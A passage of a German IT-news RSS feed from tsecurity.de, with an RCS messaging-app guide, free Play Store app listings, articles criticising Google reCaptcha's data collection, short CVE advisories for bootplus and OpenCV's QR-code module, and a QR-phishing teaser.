https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_6.jpg?resize=768%2C1764&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_6.jpg?resize=523%2C1200&amp;quality=50&amp;strip=all 523w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_6.jpg?resize=669%2C1536&amp;quality=50&amp;strip=all 669w" width="523" height="1201" sizes="(max-width: 523px) 100vw, 523px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Smart Messages ist eine Alternative zu Google Messages, die ebenfalls RCS-Chats beherrscht. Wie bei Google Messages müssen Sie auch bei Smart Messages den RCS-Chat erst aktivieren." data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>Smart Messages ist eine Alternative zu Google Messages, die ebenfalls RCS-Chats beherrscht. Wie bei Google Messages müssen Sie auch bei Smart Messages den RCS-Chat erst aktivieren.</p>
</figcaption></figure><p class="imageCredit">IDG</p></div>



<p>Gefällt Ihnen Google Messages als RCS-Chat-Client nicht, gibt es im Google Play Store mit <a href="https://play.google.com/store/apps/details?id=com.messages.chat" target="_blank" rel="noreferrer noopener">Smart Messages</a> eine alternative RCS-Chat-App mit vielen Funktionen. </p>



<p><strong>Wichtig: </strong>Möchten Sie die App nutzen, müssen Sie sie zuerst zu Ihrer Standard-SMS-App machen, bevor Sie RCS-Chat verwenden können. Normalerweise haben Sie dazu beim ersten Start die Gelegenheit. </p>



<p>Falls die Option jedoch nicht auftaucht, finden Sie sie in den Smartphone-Einstellungen unter „Apps –› Standard-Apps“. Tippen Sie hier auf „SMS-App“, und wählen Sie Smart Messages aus. </p>



<p><strong>Als Nächstes müssen Sie in Smart Messages RCS aktivieren: </strong>Öffnen Sie dazu in der App die Einstellungen über die drei horizontalen Striche, und legen Sie den Schalter bei „Rich Communication Features“ auf „On“. </p>



<p>Nach der automatischen Authentifizierung können Sie Lesebestätigungen und den Tippindikator aktivieren. Nehmen Sie gegebenenfalls weitere Einstellungen wie Dark Mode, Zustellberichte etc. vor. </p>



<p>In der Eingabezeile eines Chats stehen Ihnen Sprachnachrichten, Emojis, Sticker und GIFs zur Auswahl. Nachrichtenanhänge fügen Sie über die Büroklammer hinzu.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-large","figureStyles":null,"imgClassNames":"wp-image-2600045","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: M\u00f6chten Sie Google Messages oder Smart Messages f\u00fcr RCS-Chats verwenden, m\u00fcssen Sie die App in den Smartphone-Einstellungen unter \u201eApps \u2013\u203a Standard- Apps\u201c als SMS-App festlegen.","alt":"M\u00f6chten Sie Google Messages oder Smart Messages f\u00fcr RCS-Chats verwenden, m\u00fcssen Sie die App in den Smartphone-Einstellungen unter \u201eApps \u2013\u203a Standard- Apps\u201c als SMS-App festlegen."}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_7.jpg?quality=50&amp;strip=all&amp;w=563" alt="Möchten Sie Google Messages oder Smart Messages für RCS-Chats verwenden, müssen Sie die App in den Smartphone-Einstellungen unter „Apps –› Standard- Apps“ als SMS-App festlegen." class="wp-image-2600045" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_7.jpg?quality=50&amp;strip=all 800w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_7.jpg?resize=141%2C300&amp;quality=50&amp;strip=all 141w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_7.jpg?resize=768%2C1638&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_7.jpg?resize=563%2C1200&amp;quality=50&amp;strip=all 563w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_7.jpg?resize=720%2C1536&amp;quality=50&amp;strip=all 720w" width="563" height="1201" sizes="(max-width: 563px) 100vw, 563px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Möchten Sie Google Messages oder Smart Messages für RCS-Chats verwenden, müssen Sie die App in den Smartphone-Einstellungen unter „Apps –› Standard- Apps“ als SMS-App festlegen." data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>Möchten Sie Google Messages oder Smart Messages für RCS-Chats verwenden, müssen Sie die App in den Smartphone-Einstellungen unter „Apps –› Standard- Apps“ als SMS-App festlegen.</p>
</figcaption></figure><p class="imageCredit">IDG</p></div>



<h2 class="wp-block-heading toc">Fazit</h2>



<p>Valide Messenger-Alternative Mit der richtigen App kann RCS-Chat eine echte Alternative zu Messengern wie Whatsapp, Signal, Telegram &amp; Co. sein. Die Bedienung ist der eines Messengers ähnlich, Funktionen wie Sprachnachrichten, Emojis, Anhänge und mehr sind auch vorhanden.</p>



<p>Zwar ist die Auswahl an RCS-fähigen Apps derzeit noch überschaubar. Mit der Zeit wird sich der neue Standard aber sicherlich durchsetzen, sodass mehr Apps ihn unterstützen. Dann gibt die einzigen Einschränkungen nur noch der Provider vor – ein Grund, den Mobilfunkvertrag mal wieder zu studieren und gegebenenfalls zu einem anderen Anbieter zu wechseln.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Play Store Aktion: Diese 46 Android-Apps, Spiele, Icon Packs & Live Wallpaper gibt es heute Gratis]]></title>
<description><![CDATA[Am Donnerstag gibt es im Google Play Store viele vorübergehend kostenlose Apps, Spiele, Icon Packs und Live Wallpaper - schaut mal herein. Heute berichten wir über den Samsung Monster-Akku, zeigen die neuen Google Maps-Verkehrsmeldungen und berichten über den Pixel Video Boost. Schaut euch auch d...]]></description>
<link>https://tsecurity.de/de/2610755/it-nachrichten/google-play-store-aktion-diese-46-android-apps-spiele-icon-packs-live-wallpaper-gibt-es-heute-gratis/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2610755/it-nachrichten/google-play-store-aktion-diese-46-android-apps-spiele-icon-packs-live-wallpaper-gibt-es-heute-gratis/</guid>
<pubDate>Thu, 13 Feb 2025 10:15:42 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="640" height="480" src="https://www.googlewatchblog.de/wp-content/uploads/apps-11.02.2025-1024x768.jpg" class="attachment-large size-large wp-post-image" alt="apps 11.02.2025" decoding="async" fetchpriority="high" srcset="https://www.googlewatchblog.de/wp-content/uploads/apps-11.02.2025-1024x768.jpg 1024w, https://www.googlewatchblog.de/wp-content/uploads/apps-11.02.2025-300x225.jpg 300w, https://www.googlewatchblog.de/wp-content/uploads/apps-11.02.2025-768x576.jpg 768w, https://www.googlewatchblog.de/wp-content/uploads/apps-11.02.2025-533x400.jpg 533w, https://www.googlewatchblog.de/wp-content/uploads/apps-11.02.2025-800x600.jpg 800w, https://www.googlewatchblog.de/wp-content/uploads/apps-11.02.2025.jpg 1500w" sizes="(max-width: 640px) 100vw, 640px"><br>Am Donnerstag gibt es im Google Play Store viele vorübergehend kostenlose Apps, Spiele, Icon Packs und Live Wallpaper - schaut mal herein. Heute berichten wir über den <a href="https://www.googlewatchblog.de/2025/02/android-samsung-plant-monster-akku-fuer-die-naechste-smartphone-generation-auch-fuer-google-pixel/"><strong>Samsung Monster-Akku</strong></a>, zeigen die <a href="https://www.googlewatchblog.de/2025/02/google-maps-navigation-verkehrsstoerungen-im-auto-melden-neue-wetterkategorien-kommen-teardown/"><strong>neuen Google Maps-Verkehrsmeldungen</strong></a> und berichten über den <a href="https://www.googlewatchblog.de/2025/02/pixel-video-boost-google-kamera-ermoeglicht-jetzt-die-dauerhafte-nutzung-des-cloud-kameratricks/"><strong>Pixel Video Boost</strong></a>. Schaut euch auch die <a href="https://www.googlewatchblog.de/2025/02/google-recaptcha-kritik-am-spamschutz-neue-studie-spricht-von-datensammlung-und-wirkungslosigkeit/"><strong>Kritik an Google Recaptcha</strong></a> an.</p>
<p>Mehr lesen: <a href="https://www.googlewatchblog.de/2025/02/google-play-store-aktion-diese-46-android-apps-spiele-icon-packs-live-wallpaper-gibt-es-heute-gratis-6/">Google Play Store Aktion: Diese 46 Android-Apps, Spiele, Icon Packs &amp; Live Wallpaper gibt es heute Gratis</a></p>
<hr>
<p></p><center><strong>Keine Google-News mehr verpassen:</strong> <a href="https://news.google.com/publications/CAAqBggKMPyNRTDvkAc?hl=de"><strong>GoogleWatchBlog bei Google News abonnieren</strong></a></center>
<hr>
<p>Der Beitrag <a href="https://www.googlewatchblog.de/2025/02/google-play-store-aktion-diese-46-android-apps-spiele-icon-packs-live-wallpaper-gibt-es-heute-gratis-6/">Google Play Store Aktion: Diese 46 Android-Apps, Spiele, Icon Packs &amp; Live Wallpaper gibt es heute Gratis</a> erschien zuerst auf <a href="https://www.googlewatchblog.de/">GoogleWatchBlog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[reCaptcha ist nicht nur lästig, sondern soll auch User ausspionieren]]></title>
<description><![CDATA[Wer daran zweifelt, dass die lästigen "Ich bin kein Roboter"-Kontrollkästchen tatsächlich vor Bots und automatisierten Programmen schützen, dürfte recht haben. Schon seit einiger Zeit gibt es massive Kritik an diesen sogenannten Captchas. Mehrfach wurde ...]]></description>
<link>https://tsecurity.de/de/2609329/it-nachrichten/recaptcha-ist-nicht-nur-laestig-sondern-soll-auch-user-ausspionieren/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2609329/it-nachrichten/recaptcha-ist-nicht-nur-laestig-sondern-soll-auch-user-ausspionieren/</guid>
<pubDate>Wed, 12 Feb 2025 16:15:53 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wer daran zweifelt, dass die lästigen "Ich bin kein Roboter"-Kontrollkästchen tatsächlich vor Bots und automatisierten Programmen schützen, dürfte recht haben. Schon seit einiger Zeit gibt es massive Kritik an diesen sogenannten Captchas. Mehrfach wurde ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Recaptcha: Kritik am Spamschutz – neue Studie spricht von Datensammlung und Wirkungslosigkeit]]></title>
<description><![CDATA[Auf vielen Webseiten und in vielen Apps kommen Captchas zum Einsatz, die Nutzer als menschlich identifizieren und Spambots verhindern sollen. Nicht selten wird auf die Dienste von Google Recaptcha zurückgegriffen, das in der Grundversion kostenlos angeboten wird und die Nutzer auf unterschiedlich...]]></description>
<link>https://tsecurity.de/de/2608917/it-nachrichten/google-recaptcha-kritik-am-spamschutz-neue-studie-spricht-von-datensammlung-und-wirkungslosigkeit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2608917/it-nachrichten/google-recaptcha-kritik-am-spamschutz-neue-studie-spricht-von-datensammlung-und-wirkungslosigkeit/</guid>
<pubDate>Wed, 12 Feb 2025 13:15:52 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="640" height="360" src="https://www.googlewatchblog.de/wp-content/uploads/invisible-recaptcha-1024x576.jpg" class="attachment-large size-large wp-post-image" alt="invisible-recaptcha" decoding="async" fetchpriority="high" srcset="https://www.googlewatchblog.de/wp-content/uploads/invisible-recaptcha-1024x576.jpg 1024w, https://www.googlewatchblog.de/wp-content/uploads/invisible-recaptcha-300x169.jpg 300w, https://www.googlewatchblog.de/wp-content/uploads/invisible-recaptcha-768x432.jpg 768w, https://www.googlewatchblog.de/wp-content/uploads/invisible-recaptcha-640x360.jpg 640w, https://www.googlewatchblog.de/wp-content/uploads/invisible-recaptcha-800x450.jpg 800w, https://www.googlewatchblog.de/wp-content/uploads/invisible-recaptcha.jpg 2048w" sizes="(max-width: 640px) 100vw, 640px"><br>Auf vielen Webseiten und in vielen Apps kommen Captchas zum Einsatz, die Nutzer als menschlich identifizieren und Spambots verhindern sollen. Nicht selten wird auf die Dienste von <strong>Google Recaptcha</strong> zurückgegriffen, das in der Grundversion kostenlos angeboten wird und die Nutzer auf unterschiedlichste Arten bewerten kann. Ein neuer Bericht besagt nun, dass das mehr schlecht als recht funktioniert und eher ein riesiges Datenschutz-Problem ist.</p>
<p>Mehr lesen: <a href="https://www.googlewatchblog.de/2025/02/google-recaptcha-kritik-am-spamschutz-neue-studie-spricht-von-datensammlung-und-wirkungslosigkeit/">Google Recaptcha: Kritik am Spamschutz – neue Studie spricht von Datensammlung und Wirkungslosigkeit</a></p>
<hr>
<p></p><center><strong>Keine Google-News mehr verpassen:</strong> <a href="https://news.google.com/publications/CAAqBggKMPyNRTDvkAc?hl=de"><strong>GoogleWatchBlog bei Google News abonnieren</strong></a></center>
<hr>
<p></p><center><a href="https://ssl-vg03.met.vgwort.de/na/b98c9a01f57e49029c3bd368297605bb"><img alt="vgwort" src="https://ssl-vg03.met.vgwort.de/na/b98c9a01f57e49029c3bd368297605bb" width="16" height="16"></a></center>
<p>Der Beitrag <a href="https://www.googlewatchblog.de/2025/02/google-recaptcha-kritik-am-spamschutz-neue-studie-spricht-von-datensammlung-und-wirkungslosigkeit/">Google Recaptcha: Kritik am Spamschutz – neue Studie spricht von Datensammlung und Wirkungslosigkeit</a> erschien zuerst auf <a href="https://www.googlewatchblog.de/">GoogleWatchBlog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Captcha-Falle: Kein Schutz vor Bots, sondern versteckte Spyware]]></title>
<description><![CDATA[Captcha-Tests findet man immer wieder auf Webseiten. Die prominent platzierten Kästen mit Bilderrätseln oder mysteriösen Symbolfolgen sollen angeblich Bots abfangen und somit Webseiten schützen. Moderne Bots sind aber längst in der Lage, diese Tests auszutricksen, vor allem dank KI.



Mittlerwei...]]></description>
<link>https://tsecurity.de/de/2608912/it-nachrichten/captcha-falle-kein-schutz-vor-bots-sondern-versteckte-spyware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2608912/it-nachrichten/captcha-falle-kein-schutz-vor-bots-sondern-versteckte-spyware/</guid>
<pubDate>Wed, 12 Feb 2025 13:15:48 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Captcha-Tests findet man immer wieder auf Webseiten. Die prominent platzierten Kästen mit Bilderrätseln oder mysteriösen Symbolfolgen sollen angeblich Bots abfangen und somit Webseiten schützen. Moderne Bots sind aber längst in der Lage, diese Tests auszutricksen, vor allem dank KI.</p>



<p>Mittlerweile erfüllen die Captchas offenbar einen anderen Zweck. Denn die Tests können dafür eingesetzt werden, um Nutzerdaten zu sammeln, wie die Seite <a href="https://www.techspot.com/news/106717-google-recaptcha-not-only-useless-also-basically-spyware.html" target="_blank" rel="noreferrer noopener">Techspot</a> berichtet. Und das, ohne dass man es als User überhaupt mitbekommt.</p>



<p><strong>Lesetipp:</strong> <a href="https://www.pcwelt.de/article/2344738/woher-weiss-captcha-dass-ich-kein-roboter-bin-turing-test-erklaert.html" target="_blank" rel="noreferrer noopener">Woher weiß ein Captcha, dass ich kein Roboter bin?</a></p>



<h2 class="wp-block-heading">Captchas in der Kritik</h2>



<p>Laut Experten erfassen neue Captchas zahlreiche Daten zu den Nutzern, die sie lösen müssen. Dazu gehören neben dem <strong>verwendeten Browser </strong>auch<strong> IP-Adressen</strong> und die verwendeten <a href="https://www.pcwelt.de/article/1193534/die-besten-vpn-dienste-im-vergleich.html" target="_blank" rel="noreferrer noopener">VPN-Dienste</a>. Wer mit VPN surft, läuft sogar Gefahr, eher blockiert zu werden als so mancher Bot.</p>



<p>Das ist insofern problematisch, da man als User keine Ahnung davon hat, dass die Interaktion mit einem Captcha Daten übermittelt. Uns wird ja nur suggeriert, dass wir den Test lösen müssen, um uns als Mensch zu beweisen und Zugriff auf die Webseite zu erhalten.</p>



<h2 class="wp-block-heading">Beispiel Google</h2>



<p>Laut dem <a href="https://www.youtube.com/watch?v=VTsBP21-XpI" target="_blank" rel="noreferrer noopener">Youtube-Kanal Chuppl</a> ist vor allem Googles reCaptcha höchst problematisch. Es soll überhaupt nicht auf die Abwehr von Bots ausgelegt sein, sondern als Hauptziel die Sammlung von Nutzerdaten haben. Es speichert neben den oben genannten Beispielen angeblich auch Informationen zur <strong>Browserhistorie, Cookies und weitere Nutzerdaten</strong>, die gezielt gespeichert und an Unternehmen verkauft werden.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">

</div></figure>



<p>Durch das Klicken eines simplen Kästchens geben Nutzer also sensible Daten weiter, ohne eine Möglichkeit zu haben, diese Speicherung abzulehnen. Der Wert der dadurch gesammelten Daten wird von Experten auf <strong>circa 898 Milliarden Dollar</strong> geschätzt. Das Geschäft mit Captcha-Daten ist also überaus lukrativ. </p>



<p>Datenschützer fordern hingegen die Abschaffung von Captchas. Nicht nur erfüllen sie ihren eigentlichen Zweck nicht mehr, sie schaden auch der Nutzererfahrung auf der Webseite und bieten Einfallstore für Hacker.</p>



<p><a href="https://www.pcwelt.de/article/1173726/google-recaptcha-v3-nervige-raetsel-werden-abgeschafft.html" target="_blank" rel="noreferrer noopener">Google reCaptcha v3: Nervige Rätsel werden abgeschafft</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google-CAPTCHA in der Kritik: Nicht nur nutzlos, sondern auch Spyware]]></title>
<description><![CDATA[CAPTCHA-Tests, bei denen Nutzer verzerrten Text entziffern, Bilder auswählen oder einfache Rätsel lösen müssen, um ihre Menschlichkeit zu beweisen, stehen seit Jahren in der Kritik. Nun zeigt sich: Sie sind nicht nur wirkungslos, sondern auch Spyware.			(Weiter lesen)]]></description>
<link>https://tsecurity.de/de/2606489/it-security-nachrichten/google-captcha-in-der-kritik-nicht-nur-nutzlos-sondern-auch-spyware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2606489/it-security-nachrichten/google-captcha-in-der-kritik-nicht-nur-nutzlos-sondern-auch-spyware/</guid>
<pubDate>Tue, 11 Feb 2025 11:49:00 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://winfuture.de/news,148762.html"><img hspace="5" border="0" align="left" alt="Logo, Captcha, Recaptcha, Captchas, v3" width="1920" height="1080" src="https://i.wfcdn.de/teaser/1920/57379.jpg"></a>
			CAPTCHA-Tests, bei denen Nutzer verzerrten Text entziffern, Bilder auswählen oder einfache Rätsel lösen müssen, um ihre Menschlichkeit zu beweisen, stehen seit Jahren in der Kritik. Nun zeigt sich: Sie sind nicht nur wirkungslos, sondern auch Spyware.			(<a href="https://winfuture.de/news,148762.html">Weiter lesen</a>)]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-0705 | JoeyBling bootplus up to 247d5f6c209be1a5cf10cd0fa18e1d8cc63cf55d QrCodeController.java qrCode text redirect]]></title>
<description><![CDATA[A vulnerability has been found in JoeyBling bootplus up to 247d5f6c209be1a5cf10cd0fa18e1d8cc63cf55d and classified as problematic. Affected by this vulnerability is the function qrCode of the file src/main/java/io/github/controller/QrCodeController.java. The manipulation of the argument text lead...]]></description>
<link>https://tsecurity.de/de/2602306/sicherheitsluecken/cve-2025-0705-joeybling-bootplus-up-to-247d5f6c209be1a5cf10cd0fa18e1d8cc63cf55d-qrcodecontrollerjava-qrcode-text-redirect/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2602306/sicherheitsluecken/cve-2025-0705-joeybling-bootplus-up-to-247d5f6c209be1a5cf10cd0fa18e1d8cc63cf55d-qrcodecontrollerjava-qrcode-text-redirect/</guid>
<pubDate>Sun, 09 Feb 2025 05:20:50 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/?product.joeybling:bootplus">JoeyBling bootplus up to 247d5f6c209be1a5cf10cd0fa18e1d8cc63cf55d</a> and classified as <a href="https://vuldb.com/?kb.risk">problematic</a>. Affected by this vulnerability is the function <code>qrCode</code> of the file <em>src/main/java/io/github/controller/QrCodeController.java</em>. The manipulation of the argument <em>text</em> leads to open redirect.

This vulnerability is known as <a href="https://vuldb.com/?source_cve.293233">CVE-2025-0705</a>. The attack can be launched remotely. Furthermore, there is an exploit available.

This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Recaptcha: Google trackt, KI trainiert, Datenschützer schauen zu]]></title>
<description><![CDATA[An der Sicherheitstechnik Recaptcha hagelt es Kritik. Die zuständige Hamburger Datenschutzbehörde will dennoch nicht dagegen vorgehen. Ein Bericht von Ulrich Hottelet (Captcha, Google)]]></description>
<link>https://tsecurity.de/de/2599295/it-nachrichten/recaptcha-google-trackt-ki-trainiert-datenschuetzer-schauen-zu/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2599295/it-nachrichten/recaptcha-google-trackt-ki-trainiert-datenschuetzer-schauen-zu/</guid>
<pubDate>Fri, 07 Feb 2025 10:00:38 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An der Sicherheitstechnik Recaptcha hagelt es Kritik. Die zuständige Hamburger Datenschutzbehörde will dennoch nicht dagegen vorgehen. Ein Bericht von Ulrich Hottelet (<a href="https://www.golem.de/specials/captcha/">Captcha</a>, <a href="https://www.golem.de/specials/google/">Google</a>) <img src="https://cpx.golem.de/cpx.php?class=17&amp;aid=192985&amp;page=1&amp;ts=1738918442" alt="" width="1" height="1">]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2023-2618 | OpenCV wechat_qrcode Module up to 4.7.0 decoded_bit_stream_parser.cpp decodeHanziSegment memory leak (ID 3484 / Nessus ID 214909)]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, has been found in OpenCV wechat_qrcode Module up to 4.7.0. Affected by this issue is the function DecodedBitStreamParser::decodeHanziSegment of the file qrcode/decoder/decoded_bit_stream_parser.cpp. The manipulation leads to memory leak.

This...]]></description>
<link>https://tsecurity.de/de/2591299/sicherheitsluecken/cve-2023-2618-opencv-wechatqrcode-module-up-to-470-decodedbitstreamparsercpp-decodehanzisegment-memory-leak-id-3484-nessus-id-214909/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2591299/sicherheitsluecken/cve-2023-2618-opencv-wechatqrcode-module-up-to-470-decodedbitstreamparsercpp-decodehanzisegment-memory-leak-id-3484-nessus-id-214909/</guid>
<pubDate>Tue, 04 Feb 2025 05:21:45 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/?kb.risk">problematic</a>, has been found in <a href="https://vuldb.com/?product.opencv:wechat_qrcode_module">OpenCV wechat_qrcode Module up to 4.7.0</a>. Affected by this issue is the function <code>DecodedBitStreamParser::decodeHanziSegment</code> of the file <em>qrcode/decoder/decoded_bit_stream_parser.cpp</em>. The manipulation leads to memory leak.

This vulnerability is handled as <a href="https://vuldb.com/?source_cve.228548">CVE-2023-2618</a>. The attack may be launched remotely. There is no exploit available.

It is recommended to apply a patch to fix this issue.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2023-2617 | OpenCV wechat_qrcode Module up to 4.7.0 decoded_bit_stream_parser.cpp decodeByteSegment null pointer dereference (ID 3480)]]></title>
<description><![CDATA[A vulnerability classified as problematic was found in OpenCV wechat_qrcode Module up to 4.7.0. Affected by this vulnerability is the function DecodedBitStreamParser::decodeByteSegment of the file qrcode/decoder/decoded_bit_stream_parser.cpp. The manipulation leads to null pointer dereference.

T...]]></description>
<link>https://tsecurity.de/de/2577165/sicherheitsluecken/cve-2023-2617-opencv-wechatqrcode-module-up-to-470-decodedbitstreamparsercpp-decodebytesegment-null-pointer-dereference-id-3480/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2577165/sicherheitsluecken/cve-2023-2617-opencv-wechatqrcode-module-up-to-470-decodedbitstreamparsercpp-decodebytesegment-null-pointer-dereference-id-3480/</guid>
<pubDate>Mon, 27 Jan 2025 22:21:08 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/?kb.risk">problematic</a> was found in <a href="https://vuldb.com/?product.opencv:wechat_qrcode_module">OpenCV wechat_qrcode Module up to 4.7.0</a>. Affected by this vulnerability is the function <code>DecodedBitStreamParser::decodeByteSegment</code> of the file <em>qrcode/decoder/decoded_bit_stream_parser.cpp</em>. The manipulation leads to null pointer dereference.

This vulnerability is known as <a href="https://vuldb.com/?source_cve.228547">CVE-2023-2617</a>. The attack can be launched remotely. Furthermore, there is an exploit available.

It is recommended to apply a patch to fix this issue.]]></content:encoded>
</item>
<item>
<title><![CDATA[QR-Code als Sicherheitsfalle?]]></title>
<description><![CDATA[QR-Codes auf Verpackungen, Plakaten oder in Bars verlocken, einfach das Smartphone daran zu halten. Trotz vieler Vorteile für Unternehmen und Konsumenten, rät Chester Wisniewski, Sicherheitsprofi bei Sophos, zu Vorsicht und Einzelfallprüfung.

Tags: #Hacker | #Phishing | #QR-Code]]></description>
<link>https://tsecurity.de/de/2523935/it-security-nachrichten/qr-code-als-sicherheitsfalle/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2523935/it-security-nachrichten/qr-code-als-sicherheitsfalle/</guid>
<pubDate>Tue, 31 Dec 2024 06:03:40 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1920" height="1080" src="https://www.it-daily.net/wp-content/uploads/2023/10/QRCode-Hacker_shutterstock_2155211719.jpg" class="attachment-full size-full wp-post-image" alt="Quishing, QR-Code" decoding="async" srcset="https://www.it-daily.net/wp-content/uploads/2023/10/QRCode-Hacker_shutterstock_2155211719.jpg 1920w, https://www.it-daily.net/wp-content/uploads/2023/10/QRCode-Hacker_shutterstock_2155211719-300x169.jpg 300w, https://www.it-daily.net/wp-content/uploads/2023/10/QRCode-Hacker_shutterstock_2155211719-1024x576.jpg 1024w, https://www.it-daily.net/wp-content/uploads/2023/10/QRCode-Hacker_shutterstock_2155211719-768x432.jpg 768w, https://www.it-daily.net/wp-content/uploads/2023/10/QRCode-Hacker_shutterstock_2155211719-1536x864.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px" title="QR-Code als Sicherheitsfalle? 1"></p>
    QR-Codes auf Verpackungen, Plakaten oder in Bars verlocken, einfach das Smartphone daran zu halten. Trotz vieler Vorteile für Unternehmen und Konsumenten, rät Chester Wisniewski, Sicherheitsprofi bei Sophos, zu Vorsicht und Einzelfallprüfung.

<p>Tags: <a href="https://www.it-daily.net/thema/hacker">#Hacker</a> | <a href="https://www.it-daily.net/thema/phishing">#Phishing</a> | <a href="https://www.it-daily.net/thema/qr-code">#QR-Code</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[QR-Code als Sicherheitsfalle?]]></title>
<description><![CDATA[QR-Codes auf Verpackungen, Plakaten oder in Bars verlocken, einfach das Smartphone daran zu halten. Trotz vieler Vorteile für Unternehmen und Konsumenten, rät Chester Wisniewski, Sicherheitsprofi bei Sophos, zu Vorsicht und Einzelfallprüfung.

Tags: #Hacker | #Phishing | #QR-Code]]></description>
<link>https://tsecurity.de/de/2523934/it-security-nachrichten/qr-code-als-sicherheitsfalle/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2523934/it-security-nachrichten/qr-code-als-sicherheitsfalle/</guid>
<pubDate>Tue, 31 Dec 2024 06:03:40 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
